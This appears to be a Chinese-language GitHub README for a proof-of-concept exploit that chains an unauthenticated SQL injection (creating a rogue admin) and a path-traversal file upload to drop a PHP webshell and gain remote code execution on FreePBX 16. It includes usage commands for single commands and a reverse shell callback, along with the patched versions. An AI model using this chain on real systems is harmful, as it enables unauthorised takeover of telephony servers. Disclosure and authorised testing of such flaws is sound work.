TYehan/CVE-2025-57819-FreePBX-RCE-Exploit

# FreePBX 16 — 未授权 SQLi 到 RCE 结合两个 FreePBX 漏洞的概念验证 exploit，从**零访问权限**实现 FreePBX 16 上的**远程代码执行**。 | CVE | 组件 | 影响 | |-----|-----------|--------| | **CVE-2025-57819** | Endpoint module loader (`brand` 参数) | 未授权堆叠 SQL 注入 | | **CVE-2025-61678** | Endpoint Manager 固件上传器 (`fwbrand` 参数) | 认证后任意文件上传（路径遍历） | ## 工作原理 1. **创建管理员 (CVE-2025-57819)** — 可在未经身份验证的情况下，通过命名空间 endpoint loader 访问的堆叠 SQL 注入，用于将全新的完全权限管理员直接 `INSERT` 到 `ampusers` 表中。 2. **身份验证** — PoC 以新创建的用户身份登录管理面板。 3. **投放 webshell (CVE-2025-61678)** — 滥用 Endpoint Manager 固件上传处理程序，在 `fwbrand` 中使用 `../../../var/www/html/` 遍历，将 PHP webshell 写入 web 根目录。 4. **执行** — 运行单条命令或接收交互式 reverse shell。 ## 受影响版本 FreePBX 16（Endpoint 模块版本低于 `16.0.92`）。在 `17.0.6` 版本中也已修复。 请更新至已修复的版本。 ## 环境要求 ``` pip install requests pwntools ``` ## 用法 ``` # 单条命令 python3 exploit.py --rhost pbx.example.com --command "id" # 交互式 reverse shell（通过 pwntools 自动监听） python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444 # 纯 HTTP / 自定义端口 python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a" ``` ### 选项 | 标志 | 描述 | |------|-------------| | `--rhost` | 目标主机（必填） | | `--rport` | 目标端口（默认为 `443`） | | `--http` | 使用 HTTP 而不是 HTTPS | | `--lhost` / `--lport` | Reverse shell 回调地址 | | `--command` | 运行单条命令而不是 shell | ## 免责声明 此概念验证仅严格用于教育目的和授权的安全测试。它仅适用于您拥有的系统，或者您已获得明确、有据可查的书面测试许可的系统（例如：授权的渗透测试、范围内的漏洞赏金计划或 CTF 环境）。 未经授权访问计算机系统在大多数司法管辖区都是违法的。作者及任何贡献者均不承担任何责任，也不对因使用本软件而产生的任何滥用、损害或法律后果负责。使用此 PoC 即表示您同意，您需对确保自身拥有测试目标系统的合法权利负全部责任。 ## 许可证 本 PoC 按“原样”提供，用于教育和授权安全测试目的，不提供任何形式的明示或暗示的保证。作者对因使用本 PoC 而造成的任何直接、间接、附带或后果性损害不承担任何责任。 ## 关键词 FreePBX · FreePBX 16 · FreePBX 16.0.40.7 · Sangoma PBX · Asterisk · CVE-2025-57819 · CVE-2025-61678 · 未授权 SQL 注入 · 堆叠查询注入 · endpoint module · Endpoint Manager · 认证后文件上传 · 路径遍历 · 远程代码执行 · RCE · PoC · exploit · VoIP 安全 作者 [TYehan](https://tyehan.github.io/)

标签：CISA项目, FreePBX, 编程工具, 远程代码执行, 逆向工具